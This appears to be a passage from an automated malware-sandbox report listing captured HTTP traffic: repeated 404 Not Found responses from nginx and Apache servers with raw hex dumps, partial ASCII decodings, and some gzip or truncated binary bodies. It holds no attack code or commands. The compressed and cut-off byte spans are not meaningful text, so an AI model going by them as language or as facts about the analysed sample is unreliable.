0d cb 17 a5 4b b9 b9 1d c8 f8 35 f2 44 89 3a 43 48 59 cc 27 16 ac 49 15 6a fe d4 8e 18 32 95 ab ac cc 76 f9 5f fe e8 63 1b 94 c7 84 e7 42 92 ae a1 f2 b9 6b 53 de e6 e8 16 45 ac f6 e9 ad 5a a6 04 b9 a9 3a 8a fe bc f7 2f 4f 20 91 d7 6e 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 309TH)_L$.<#}$Dbv4hpNttyty/"E^gc_f6M]i/DEl0I]`;sS SaRyl*?z(ZLfA3Nw`<)Fdxc)\3]j,6>~H_N=La0Tg%{6KKoeBsO7__\mXC<Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:35:56 GMTContent-Type: text/htmlContent-Length: 1390Connection: closeVary: Accept-EncodingLast-Modified: Tue, 02 Jan 2018 12:36:34 GMTETag: "6b40108-56e-561ca595b5880"Accept-Ranges: bytesData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 d1 f2 f0 e0 ed e8 f6 e0 20 ed e5 20 ed e0 e9 e4 e5 ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 63 68 6f 73 74 2e 72 75 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 6d 63 6c 6f 67 6f 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 6a 70 67 22 20 61 6c 74 3d 22 cc e0 ea f5 ee f1 f2 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 3c 62 72 3e 3c 62 72 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 62 72 3e 43 f2 f0 e0 ed e8 f6 e0 20 ed e5 20 ed e0 e9 e4 e5 ed e0 3c 2f 48 31 3e 3c 62 72 3e 0a dd f2 e0 20 f1 f2 f0 e0 ed e8 f6 e0 20 f1 e3 e5 ed e5 f0 e8 f0 ee e2 e0 ed e0 20 e0 e2 f2 ee ec e0 f2 e8 f7 e5 f1 ea e8 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 63 68 6f 73 74 2e 72 75 2f 22 3e f5 ee f1 f2 e8 ed e3 ee ec 20 cc e0 ea f5 ee f1 f2 3c 2f 61 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:36:02 GMTServer: ApacheLast-Modified: Thu, 29 Oct 2020 17:44:48 GMTETag: "82a1a-f65-5b2d2d61e36a7"Accept-Ranges: bytesContent-Length: 3941X-Frame-Options: DENYConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:36:04 GMTServer: ApacheLast-Modified: Thu, 29 Oct 2020 17:44:48 GMTETag: "82a1a-f65-5b2d2d61e36a7"Accept-Ranges: bytesContent-Length: 3941X-Frame-Options: DENYConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:36:06 GMTServer: ApacheLast-Modified: Thu, 29 Oct 2020 17:44:48 GMTETag: "82a1a-f65-5b2d2d61e36a7"Accept-Ranges: bytesContent-Length: 3941X-Frame-Options: DENYConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:14 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 09:36:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 29 Nov 2022 09:36:43 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a 10 d4 95 12 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 86 b8 24 97 68 e7 e3 bd dd f7 66 1c 5f 7e 48 df 2f 7f dc df 40 e5 9a fa fa 22 ee ff 20 ae 50 c8 eb 0b 80 b8 41 27 20 af 84 b1 e8 92 a0 75 45 f8 36 f0 09 eb 76 35 82 db ad 30 09 1c 6e 5d 94 5b eb 33 1e 6a 0c 99 96 bb 31 bc 58 09 e3 14 9a 31 50 61 44 83 f0 9b 41 8f 7f 15 52 59 b9 d9 d5 74 fa 72 7e 92 dc 90 74 d5 33 b9 46 98 92 d4 6c 7a da b5 12 52 92 2a 87 52 99 36 12 cd 50 46 b7 ae 26 85 43 a9 42 2b 17 5a fa 85 cf dc 64 8d c6 51 2e ea 50 d4 54 aa 59 26 2c 76 50 a7 17 cb 44 fe 58 1a dd 2a 39 73 46 28 cb ea a0 72 c7 75 7f 8e 44 e8 64 1c 10 4d 33 65 51 eb cd ac 22 29 51 9d 22 c4 91 37 e8 89 87 fc 06 e6 4a 82 bb f4 7b 00 8a bd 48 02 dc ae c8 60 6f db de e9 43 15 29 89 db 31 14 ba 66 96 31 88 ba 3e 34 dd a6 e9 ed 97 9b 77 e9 b2 9f 83 7e 40 ce b7 19 9d 69 b7 a7 ba 0c 43 f8 e8 91 d9 25 f8 ca 23 16 2e 45 09 05 6d d1 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 4d 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a9 69 9b a7 a1 d6 a2 f1 67 91 71 d5 74 7e 78 e7 9a 70 b3 d2 c6 75 cf 8c a3 fd 42 c4 9d 1f 9e 5e d2 1a 48 26 c1 7e c0 7b 31 22 8e fa ac cd 0d ad dc d3 f5 78 10 6b d1 47 fb 2d 91 3a 6f 1b 36 64 b2 31 e4 f0 d5 91 e9 87 05 19 c5 ff c5 81 5a a8 b2 15 25 3b f9 99 d1 17 9e 33 18 0d 42 1d 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 47 d6 7a 92 eb 26 2a 4c d3 1d a3 73 fd 1b 1e 0d bd 99 d4 3a 17 8e b4 9a 54 da 3a 60 d8 b3 8d a3 4f e9 5d ba b8 ef 29 bf 2d ce f1 8c a2 ee 3a 93 07 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ee 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9a 51 15 c5 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCPc{Z{7]gN$hf_~H/@" PA' uE6v50n][3j1X1PaDARYtr~t3FlzRR6PF&CB+ZdQ.PTY&,vPDX9sF(ruDdM3eQ")Q"7J{H`oC)1f1>4w~@iC%#.Eme!9-Fg&qM9GpU~P$9"GJd:Fligqt~xpuB^H&~{1"xkG-:o6d1Z%;3B <\|Gz&Ls:T:`O])-:RFBW+}c_Q0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 29 Nov 2022 09:36:45 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a 10 d4 95 12 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 86 b8 24 97 68 e7 e3 bd dd f7 66 1c 5f 7e 48 df 2f 7f dc df 40 e5 9a fa fa 22 ee ff 20 ae 50 c8 eb 0b 80 b8 41 27 20 af 84 b1 e8 92 a0 75 45 f8 36 f0 09 eb 76 35 82 db ad 30 09 1c 6e 5d 94 5b eb 33 1e 6a 0c 99 96 bb 31 bc 58 09 e3 14 9a 31 50 61 44 83 f0 9b 41 8f 7f 15 52 59 b9 d9 d5 74 fa 72 7e 92 dc 90 74 d5 33 b9 46 98 92 d4 6c 7a da b5 12 52 92 2a 87 52 99 36 12 cd 50 46 b7 ae 26 85 43 a9 42 2b 17 5a fa 85 cf dc 64 8d c6 51 2e ea 50 d4 54 aa 59 26 2c 76 50 a7 17 cb 44 fe 58 1a dd 2a 39 73 46 28 cb ea a0 72 c7 75 7f 8e 44 e8 64 1c 10 4d 33 65 51 eb cd ac 22 29 51 9d 22 c4 91 37 e8 89 87 fc 06 e6 4a 82 bb f4 7b 00 8a bd 48 02 dc ae c8 60 6f db de e9 43 15 29 89 db 31 14 ba 66 96 31 88 ba 3e 34 dd a6 e9 ed 97 9b 77 e9 b2 9f 83 7e 40 ce b7 19 9d 69 b7 a7 ba 